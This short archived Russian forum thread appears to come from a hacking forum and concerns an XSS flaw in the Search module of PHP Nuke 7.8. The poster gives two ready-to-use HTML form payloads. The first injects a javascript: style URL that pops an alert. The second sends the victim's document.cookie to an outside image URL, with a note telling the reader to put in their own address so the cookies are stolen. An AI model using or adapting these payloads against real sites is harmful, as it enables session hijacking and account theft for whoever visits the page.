Просмотр полной версии : XSS в PHP Nuke 7.8
{BuT@Min}
17.01.2007, 00:16
:D
маладец что нашел...+++
просто алерт
<form action="http://nuke/modules.php?name=Search" method="post">
<input type=hidden name="query" value='search"style="search"style="background:url(javascript:alert())'>
<input type="submit" value="Искать">
</form>
по идее должно воровать куки...только поменяй ]http://antichat.org/s/HakNet.gif на свой.
<form action="http://nuke/modules.php?name=Search" method="post">
<input type=hidden name="query" value='search"style="background:url(javascript:img=new
Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;)'>
<input type="submit" value="Искать">
</form>
что с етим делать)) четай
здесь (http://forum.antichat.ru/showthread.php?p=159980#post159980)
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot